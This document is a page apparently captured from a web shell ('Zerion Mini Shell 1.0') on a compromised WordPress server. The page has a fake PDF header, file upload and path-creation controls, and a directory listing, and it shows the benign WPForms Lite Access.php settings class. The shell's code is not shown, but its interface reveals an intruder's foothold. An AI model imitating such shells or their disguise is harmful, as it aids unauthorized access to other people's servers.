%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/t/r/a/tradesc/www/relax/wp-content/plugins/wpforms-lite/src/Lite/Admin/Settings/
Upload File :
Create Path :
Current File : /home/t/r/a/tradesc/www/relax/wp-content/plugins/wpforms-lite/src/Lite/Admin/Settings/Access.php

<?php

namespace WPForms\Lite\Admin\Settings;

use WPForms\Admin\Education\Helpers;

/**
 * Settings Access tab.
 *
 * @since 1.5.8
 */
class Access {

	/**
	 * View slug.
	 *
	 * @since 1.5.8
	 *
	 * @var string
	 */
	const SLUG = 'access';

	/**
	 * Constructor.
	 *
	 * @since 1.5.8
	 */
	public function __construct() {

		$this->hooks();
	}

	/**
	 * Hooks.
	 *
	 * @since 1.5.8
	 */
	public function hooks() {

		add_action( 'admin_enqueue_scripts', [ $this, 'enqueues' ] );
		add_filter( 'wpforms_settings_tabs', [ $this, 'add_tab' ] );
		add_filter( 'wpforms_settings_defaults', [ $this, 'add_section' ] );
	}

	/**
	 * Enqueues.
	 *
	 * @since 1.5.8
	 */
	public function enqueues() {

		if ( ! wpforms_is_admin_page( 'settings', self::SLUG ) ) {
			return;
		}

		// Lity.
		wp_enqueue_style(
			'wpforms-lity',
			WPFORMS_PLUGIN_URL . 'assets/lib/lity/lity.min.css',
			null,
			'3.0.0'
		);

		wp_enqueue_script(
			'wpforms-lity',
			WPFORMS_PLUGIN_URL . 'assets/lib/lity/lity.min.js',
			[ 'jquery' ],
			'3.0.0',
			true
		);
	}

	/**
	 * Add Access tab.
	 *
	 * @since 1.5.8
	 *
	 * @param array $tabs Array of tabs.
	 *
	 * @return array Array of tabs.
	 */
	public function add_tab( $tabs ) {

		$tab = [
			self::SLUG => [
				'name'   => esc_html__( 'Access', 'wpforms-lite' ),
				'form'   => false,
				'submit' => false,
			],
		];

		return wpforms_list_insert_after( $tabs, 'geolocation', $tab );
	}

	/**
	 * Add Access settings section.
	 *
	 * @since 1.5.8
	 *
	 * @param array $settings Settings sections.
	 *
	 * @return array
	 */
	public function add_section( $settings ) {

		$settings[ self::SLUG ][ self::SLUG . '-page' ] = [
			'id'       => self::SLUG . '-page',
			'content'  => wpforms_render( 'education/admin/page', $this->template_data(),true ),
			'type'     => 'content',
			'no_label' => true,
		];

		return $settings;
	}

	/**
	 * Get the template data.
	 *
	 * @since 1.8.6
	 *
	 * @return array
	 */
	private function template_data(): array {

		$images_url = WPFORMS_PLUGIN_URL . 'assets/images/lite-settings-access/';

		return [
			'features'             => [
				__( 'Create Forms', 'wpforms-lite' ),
				__( 'Delete Forms', 'wpforms-lite' ),
				__( 'Edit Forms Entries', 'wpforms-lite' ),
				__( 'Edit Forms', 'wpforms-lite' ),
				__( 'Delete Others Forms', 'wpforms-lite' ),
				__( 'Edit Others Forms Entries', 'wpforms-lite' ),
				__( 'Edit Others Forms', 'wpforms-lite' ),
				__( 'View Forms Entries', 'wpforms-lite' ),
				__( 'Delete Forms Entries', 'wpforms-lite' ),
				__( 'View Forms', 'wpforms-lite' ),
				__( 'View Others Forms Entries', 'wpforms-lite' ),
				__( 'Delete Others Forms Entries', 'wpforms-lite' ),
				__( 'View Others Forms', 'wpforms-lite' ),
			],
			'images'               => [
				[
					'url'   => $images_url . 'screenshot-access-controls.png',
					'url2x' => $images_url . 'screenshot-access-controls@2x.png',
					'title' => __( 'Simple Built-in Controls', 'wpforms-lite' ),
				],
				[
					'url'   => $images_url . 'screenshot-members.png',
					'url2x' => $images_url . 'screenshot-members@2x.png',
					'title' => __( 'Members Integration', 'wpforms-lite' ),
				],
				[
					'url'   => $images_url . 'screenshot-user-role-editor.png',
					'url2x' => $images_url . 'screenshot-user-role-editor@2x.png',
					'title' => __( 'User Role Editor Integration', 'wpforms-lite' ),
				],
			],
			'utm_medium'           => 'Settings - Access',
			'utm_content'          => 'Access Controls',
			'heading_title'        => __( 'Access Controls', 'wpforms-lite' ),
			'heading_description'  => sprintf(
				'<p>%1$s</p>',
				__( 'Access controls allows you to manage and customize access to WPForms functionality. You can easily grant or restrict access using the simple built-in controls, or use our official integrations with Members and User Role Editor plugins.', 'wpforms-lite' )
			),
			'badge'                => __( 'Pro', 'wpforms-lite' ),
			'features_description' => __( 'Custom access to the following capabilities…', 'wpforms-lite' ),
		];
	}

	/**
	 * Generate and output section "Heading" row HTML.
	 *
	 * @since 1.5.8
	 * @deprecated 1.8.6
	 */
	public function output_section_row_heading() {

		_deprecated_function( __METHOD__, '1.8.6 of the WPForms plugin' );

		return sprintf(
			'<h4>%1$s%2$s</h4><p>%3$s</p><p>%4$s</p>',
			esc_html__( 'Access Controls', 'wpforms-lite' ),
			Helpers::get_badge( 'Pro' ),
			esc_html__( 'Access controls allows you to manage and customize access to WPForms functionality.', 'wpforms-lite' ),
			esc_html__( 'You can easily grant or restrict access using the simple built-in controls, or use our official integrations with Members and User Role Editor plugins.', 'wpforms-lite' )
		);
	}

	/**
	 * Generate and output section "Screenshots" row HTML.
	 *
	 * @since 1.5.8
	 * @deprecated 1.8.6
	 */
	public function output_section_row_screenshots() {

		_deprecated_function( __METHOD__, '1.8.6 of the WPForms plugin' );

		$format = '<div class="cont">
			<img src="%1$s" srcset="%2$s 2x" alt="%6$s"/>
			<a href="%3$s" class="hover" data-lity data-lity-srcset="%4$s 2x" data-lity-desc="%6$s"></a>
			<span>%5$s</span>
		</div>';

		$images_url = WPFORMS_PLUGIN_URL . 'assets/images/lite-settings-access/';

		$content = sprintf(
			$format,
			esc_url( $images_url . 'thumbnail-access-controls.png' ),
			esc_url( $images_url . 'thumbnail-access-controls@2x.png' ),
			esc_url( $images_url . 'screenshot-access-controls.png' ),
			esc_url( $images_url . 'screenshot-access-controls@2x.png' ),
			esc_html__( 'Simple Built-in Controls', 'wpforms-lite' ),
			esc_attr( esc_html__( 'Simple Built-in Controls', 'wpforms-lite' ) )
		);

		$content .= sprintf(
			$format,
			esc_url( $images_url . 'thumbnail-members.png' ),
			esc_url( $images_url . 'thumbnail-members@2x.png' ),
			esc_url( $images_url . 'screenshot-members.png' ),
			esc_url( $images_url . 'screenshot-members@2x.png' ),
			esc_html__( 'Members Integration', 'wpforms-lite' ),
			esc_attr( esc_html__( 'Members Integration', 'wpforms-lite' ) )
		);

		$content .= sprintf(
			$format,
			esc_url( $images_url . 'thumbnail-user-role-editor.png' ),
			esc_url( $images_url . 'thumbnail-user-role-editor@2x.png' ),
			esc_url( $images_url . 'screenshot-user-role-editor.png' ),
			esc_url( $images_url . 'screenshot-user-role-editor@2x.png' ),
			esc_html__( 'User Role Editor Integration', 'wpforms-lite' ),
			esc_attr( esc_html__( 'User Role Editor Integration', 'wpforms-lite' ) )
		);

		return $content;
	}

	/**
	 * Generate and output section "Capabilities" row HTML.
	 *
	 * @since 1.5.8
	 * @deprecated 1.8.6
	 */
	public function output_section_row_caps() {

		_deprecated_function( __METHOD__, '1.8.6 of the WPForms plugin' );

		$caps = [
			[
				esc_html__( 'Create Forms', 'wpforms-lite' ),
				esc_html__( 'Edit Forms', 'wpforms-lite' ),
				esc_html__( 'Edit Others Forms', 'wpforms-lite' ),
				esc_html__( 'View Forms', 'wpforms-lite' ),
				esc_html__( 'View Others Forms', 'wpforms-lite' ),
			],
			[
				esc_html__( 'Delete Forms', 'wpforms-lite' ),
				esc_html__( 'Delete Others Forms', 'wpforms-lite' ),
				esc_html__( 'View Forms Entries', 'wpforms-lite' ),
				esc_html__( 'View Others Forms Entries', 'wpforms-lite' ),
			],
			[
				esc_html__( 'Edit Forms Entries', 'wpforms-lite' ),
				esc_html__( 'Edit Others Forms Entries', 'wpforms-lite' ),
				esc_html__( 'Delete Forms Entries', 'wpforms-lite' ),
				esc_html__( 'Delete Others Forms Entries', 'wpforms-lite' ),
			],
		];

		$content = '<p>' . esc_html__( 'Custom access to the following capabilities…', 'wpforms-lite' ) . '</p>';

		foreach ( $caps as $column ) {
			$content .= '<ul>';
			foreach ( $column as $cap ) {
				$content .= '<li>' . $cap . '</li>';
			}
			$content .= '</ul>';
		}

		return $content;
	}

	/**
	 * Generate and output section "Upgrade to Pro" row HTML.
	 *
	 * @since 1.5.8
	 * @deprecated 1.8.6
	 */
	public function output_section_row_upgrade_to_pro() {

		_deprecated_function( __METHOD__, '1.8.6 of the WPForms plugin' );

		return sprintf(
			'<a href="%1$s" target="_blank" rel="noopener noreferrer" class="wpforms-upgrade-modal wpforms-btn wpforms-btn-lg wpforms-btn-orange">%2$s</a>',
			esc_url( wpforms_admin_upgrade_link( 'Settings - Access', 'Access Controls' ) ),
			esc_html__( 'Upgrade to WPForms Pro', 'wpforms-lite' )
		);
	}
}

Zerion Mini Shell 1.0